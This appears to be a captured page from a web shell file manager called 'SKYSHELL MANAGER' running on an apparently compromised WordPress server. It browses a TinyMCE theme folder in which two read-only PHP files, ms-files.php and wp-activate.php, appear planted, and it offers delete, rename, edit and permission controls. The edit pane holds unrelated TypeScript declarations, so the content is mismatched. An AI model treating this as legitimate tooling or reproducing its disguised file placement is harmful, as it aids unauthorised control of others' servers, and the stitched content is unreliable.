📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: dataType.d.ts
import type { ErrorObject, AnySchemaObject } from "../../types"; import type { SchemaObjCxt } from ".."; import { JSONType } from "../rules"; import { Code, Name } from "../codegen"; export declare enum DataType { Correct = 0, Wrong = 1 } export declare function getSchemaTypes(schema: AnySchemaObject): JSONType[]; export declare function getJSONTypes(ts: unknown | unknown[]): JSONType[]; export declare function coerceAndCheckDataType(it: SchemaObjCxt, types: JSONType[]): boolean; export declare function checkDataType(dataType: JSONType, data: Name, strictNums?: boolean | "log", correct?: DataType): Code; export declare function checkDataTypes(dataTypes: JSONType[], data: Name, strictNums?: boolean | "log", correct?: DataType): Code; export declare type TypeError = ErrorObject<"type", { type: string; }>; export declare function reportTypeError(it: SchemaObjCxt): void;
Save